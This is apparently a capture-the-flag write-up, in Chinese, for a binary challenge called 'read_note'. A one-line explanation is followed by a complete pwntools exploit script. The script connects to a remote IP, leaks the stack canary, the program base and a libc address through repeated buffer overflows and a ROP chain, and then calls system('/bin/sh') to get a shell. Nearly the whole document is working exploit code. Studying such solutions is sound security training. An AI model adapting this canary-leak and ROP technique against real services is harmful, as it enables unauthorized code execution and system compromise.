这道题不算太难多次返回main函数就可以了,第一次就leak出canary然后修改最低位就可以返回main函数第二次我们leak出程序的基址再次返回main函数第三次函数我们泄露出libc最后一次返回main函数我们就可以getshell了
exp:
from pwn import *
from LibcSearcher import *
#p=process('./read_note')
p=remote('114.116.54.89',10000)
elf=ELF('./read_note')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
gdb.attach(p)
#debug()
#leak canary
pop_rdi=0xe03
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('note len:')
p.sendline('800')
payload='a'*600
p.sendline(payload)
p.recvuntil('aaaaaaaaa\n')
canary=u64('\x00'+p.recv(7))
log.success('canary: '+hex(canary))
p.recvuntil('note(len is 624)')
#debug()
payload='a'*600+p64(canary)+p64(1)+'\x20'
#pause()
#leak elf low_address
p.send(payload)
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('note len:')
p.sendline('800')
payload='a'*615 #sendline+'\x0a'
#debug()
p.sendline(payload)
p.recvuntil('aaaaaaaaa\n')
main_e=u64(p.recv(6)+'\x00\x00')
base=main_e-0xd2e
log.success('base: '+hex(base))
p.recvuntil('24)')
payload='a'*600+p64(canary)+p64(0)+p64(base+0xd20)
p.send(payload)
p.recvuntil('path:')
p.sendline('flag1')
p.recvuntil('len:')
p.sendline('800')
payload='a'*600+p64(canary)+p64(1)+p64(pop_rdi+base)+p64(elf.got['puts']+base)+p64(elf.plt['puts']+base)+p64(base+0xd20)
p.sendline(payload)
#debug()
pause()
payload='a'*600+p64(canary)+p64(0)+p64(pop_rdi+base)
p.send(payload)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
#libc=LibcSearcher('puts',put_addr)
system_addr=libc.symbols['system']+put_addr-libc.symbols['puts']
bin_sh=libc.search('/bin/sh').next()+put_addr-libc.symbols['puts']
p.sendline('flag1')
p.recvuntil('len:')
p.sendline('800')
payload='a'*600+p64(canary)+p64(0)+p64(base+pop_rdi)+p64(bin_sh)+p64(system_addr)+p64(base+0xd20)
p.sendline(payload)
payload='a'*600+p64(canary)+p64(1)+p64(pop_rdi+base)
p.send(payload)
p.interactive()
